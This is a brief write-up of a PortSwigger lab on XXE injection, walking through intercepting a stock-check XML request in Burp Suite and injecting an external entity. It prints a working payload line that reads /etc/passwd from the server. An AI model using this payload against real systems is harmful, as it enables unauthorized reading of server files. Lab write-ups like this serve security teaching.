XXE Injection — Portswigger Lab 1
Accessing the lab, we get the following landing page.
Clicking on any product to view detail, we can see the check stock functionality at the end of product description.
Clicking on check stock, it return the stock amount in that store.
Analyzing the request in burp suite, it’s POSTing data using XML.
Sending request to burp repeater, we define DTD (Document Type Definition) which contains an External Entity name
pwn which reads data from /etc/passwd file. We access this entity in product id tags.
<!DOCTYPE abc [ <!ENTITY pwn SYSTEM "file:///etc/passwd"> ]>
Sending the request, we get bad request error but it also returns the data of /etc/passwd file.